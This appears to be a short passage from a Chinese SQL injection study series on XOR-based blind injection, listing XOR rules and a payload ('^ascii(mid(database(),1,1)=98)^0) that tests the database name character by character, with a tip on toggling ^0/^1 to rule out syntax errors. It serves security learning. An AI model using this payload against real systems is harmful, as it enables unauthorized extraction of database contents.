异或运算规则: 1^1=0 0^0=0 0^1=1 1^1^1=0 1^1^0=0 构造payload:‘^ascii(mid(database(),1,1)=98)^0
1^1=0 0^0=0 0^1=1
1^1^1=0 1^1^0=0
‘^ascii(mid(database(),1,1)=98)^0
注意这里会多加一个^0或1是因为在盲注的时候可能出现了语法错误也无法判断,而改变这里的0或1,如果返回的结果是不同的,那就可以证明语法是没有问题的
login3
SQL注入学习总结(八):其他SQL注入的异或注入
原文:https://www.cnblogs.com/vincy99/p/9642956.html
